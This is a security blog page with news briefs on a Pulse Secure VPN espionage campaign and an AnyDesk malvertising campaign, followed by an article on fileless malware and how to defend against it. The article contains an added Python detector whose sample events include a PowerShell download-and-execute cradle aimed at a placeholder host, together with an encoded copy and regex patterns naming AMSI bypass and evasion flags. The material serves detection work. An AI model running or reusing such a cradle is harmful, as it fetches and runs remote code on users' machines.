On 20 April, FireEye researchers published the discovery and analysis of an espionage campaign exploiting vulnerabilities in Pulse Secure VPN devices by alleged Chinese threat actors. Now, a month later, the researchers have continued to build on their findings. The FLARE reverse engineering team has identified 4 new malware families related to UNC2630, specifically designed to manipulate Pulse Secure devices, called BLOODMINE, BLOODBANK, CLEANPULSE and RAPIDPULSE. In addition, CISA has updated its alert to include the threat actor’s new TTPs, IoCs and updated mitigation measures. Ivanti’s security incident response team has released a new tool to check the integrity of Pulse Connect Secure software.

Learn more: https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

​​Malvertising campaign using AnyDesk software

CrowdStrike’s Falcon Complete team has published an analysis of a malvertising campaign using AnyDesk remote desktop software as a decoy. The operators of the campaign have reportedly made use of Google’s advertising platform to impersonate the legitimate AnyDesk website, appearing in searches before ads for the legitimate software itself. Through the fake website, users would download the AnyDesk installer, which has been previously compromised with malicious functionality. The researchers suggest that around 40% of the clicks on these malicious Google ads resulted in installations of the compromised AnyDesk binary, while in 20% of the installations the threat actors communicated directly with the victims’ computers to assign tasks or execute commands.

Full information: https://www.crowdstrike.com/blog/falcon-complete-disrupts-malvertising-campaign-targeting-anydesk/

Fileless Malware: A Growing but Controllable Attack

Diego Samuel Espitia    25 May, 2021

For some years now, WatchGuard has been publishing a periodic report on the threats detected on the Internet. Following the acquisition of Panda, this report has become even more relevant, as it now includes endpoint detections, giving a broader view and more detail on the types of incidents taking place.

The latest report shows a very significant increase in fileless malware attacks, something we have been talking about for a few years now because of the danger they entail and how hard they are to detect. Criminals are evidently taking advantage of this: comparing the samples reported in 2019 and 2020, the use of this technique grew by around 900%.

Origin

This problem is almost as old as operating systems themselves. The first example of this type of threat dates from 1987 with the so-called Lehigh virus, named after Lehigh University, where it appeared during computer science lab sessions. It stayed in RAM and, with each execution or call of COMMAND.COM, incremented a counter; as the author tells it, it did not damage the system and disappeared when the computer was restarted.

But this development marked a milestone. Until then, attacks had always relied on hosting the malicious code on the hard disk, which exposes it to any antivirus able to recognise its malicious characteristics. By never touching the disk and living only in memory, the malware gained an advantage in avoiding detection, but was left with very little room for the sophisticated attacks that require extensive code.

How Are These Attacks Carried Out?

Nowadays, toolkits such as PowerSploit and Cobalt Strike allow criminals to develop much more advanced and precise fileless malware without having to know the full details of how the system works. An example is how PowerSploit can inject a DLL into a running process with a single command, turning DLL injection into a simple yet sophisticated attack.

This has been extensively analysed in the MITRE ATT&CK matrices, which even include an entry for PowerSploit, so that defence teams know in advance which capabilities this kit gives the attacker and which specific techniques each of them maps to.

Even within our team, a framework was developed so that corporate attack and defence teams can investigate and detect possible security breaches: UAC-A-Mola, which includes several automated ways of bypassing User Account Control (UAC) on Windows systems, mainly through fileless techniques.

How Can We Defend Ourselves?

On the defensive side, the advances Windows has made to contain this threat are increasingly useful and require less complex deployments within an organisation’s network. As we have discussed on previous occasions on our blog, the capabilities offered by AMSI (Antimalware Scan Interface) are undoubtedly a fundamental complement for protecting against the coming increase in fileless attacks.

However, in most organisations the controls provided by this native operating system component are not implemented, even though they would allow incoming scripts to be analysed and anomalies detected. An example of what AMSI makes possible is our AMSIext browser extension, which connects the browser to AMSI so that every potential script contained in a website is analysed by this engine, detecting anomalies even when execution never touches the hard disk.

Another way criminals typically carry out fileless attacks is to combine them with macros in Office documents: the macro language is used to download and assemble the malicious code in memory, delaying detection by traditional antivirus and complicating it for endpoint systems.
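The macro stage described above almost always ends in a PowerShell command line that downloads and executes code in memory, so that command line (or the Script Block Logging text behind it) is where a defender can look. The following is an added example, not code from the article or from ElevenPaths: it decodes an -EncodedCommand payload when present and then tallies indicator families over the visible command and the decoded text. The sample events, the indicator lists and the hypothetical host example.invalid are all constructed for illustration.

```python
"""Triage of PowerShell command lines for fileless download-and-execute
patterns (added example, constructed indicators and events)."""
import base64
import re
from typing import Dict, List, Optional

# Indicator families seen in macro-launched fileless stagers.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\bIEX\b|\[(?:System\.)?Reflection\.Assembly\]::Load\b|\bAdd-Type\b", re.I),
    "obfuscation": re.compile(
        r"FromBase64String|-EncodedCommand\b|-enc\b|-ec\b|-e\b|IO\.Compression", re.I),
    "defence_evasion": re.compile(
        r"-WindowStyle\s+Hidden|-w\s+hidden|-ExecutionPolicy\s+Bypass|-ep\s+bypass|amsiInitFailed", re.I),
}

# -EncodedCommand (and its short aliases) takes base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the clear-text script behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmd: str) -> Dict[str, object]:
    """Expand any encoded payload, then tally indicator families over the
    visible command line plus the decoded text. In-memory execution together
    with at least one other family is the fileless stager shape."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = {}
    for family, rx in INDICATORS.items():
        found = sorted({m.group(0) for m in rx.finditer(text)})
        if found:
            hits[family] = found
    suspicious = "in_memory_exec" in hits and len(hits) >= 2
    return {"decoded": decoded, "hits": hits, "suspicious": suspicious}


# Constructed sample events (not real captures); example.invalid is hypothetical.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"

SAMPLE_EVENTS: List[str] = [
    # 1. routine administration: no indicator families
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # 2. macro-launched download cradle in the clear
    'powershell.exe -w hidden -ep bypass -c "' + _CRADLE + '"',
    # 3. the same cradle hidden behind -enc (built here by encoding it)
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii"),
    # 4. payload assembled and loaded in memory from an embedded base64 blob
    'powershell.exe -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)"',
]


def triage(events: List[str]) -> List[Dict[str, object]]:
    """Score every event; callers alert on the ones flagged suspicious."""
    return [score(e) for e in events]


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(verdict["suspicious"], sorted(verdict["hits"]), event[:60])
```

Event 3 is the case that matters: on the raw command line only the hidden window and the -enc switch are visible, and it is the decoded text that supplies the cradle and the IEX. Event 4 has no download at all, which is why the rule keys on in-memory execution rather than on network activity.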

Case Study

Attacks such as those carried out by IcedID show how beneficial this technique is for attackers: IcedID builds fileless execution into its toolset, using PowerShell to download and install its malicious DLLs, which keeps its actions almost invisible to antivirus, as seen in the VirusTotal analysis image.

With our DIARIO tool we isolate these macros for analysis and detection of malicious behaviour, so that the check can also be built into the analysis flow that an organisation should apply to every file it receives in order to mitigate this type of attack. Continuing with IcedID, the extraction and analysis of the macros performed by DIARIO flags them as suspected malware and shows the three macros used for that purpose.

As can be seen, although the increase in these attacks is exponential, the effectiveness of the attacks can be mitigated with several actions:

  • Implementing appropriate controls on every endpoint in the network.
  • Integrating the operating system’s own tools with extensions or developments that make use of these capabilities without the need for manual deployments.
  • Proper training and awareness of staff on how to proceed, so that these tools are effective in detection and are not defeated by poor handling practices.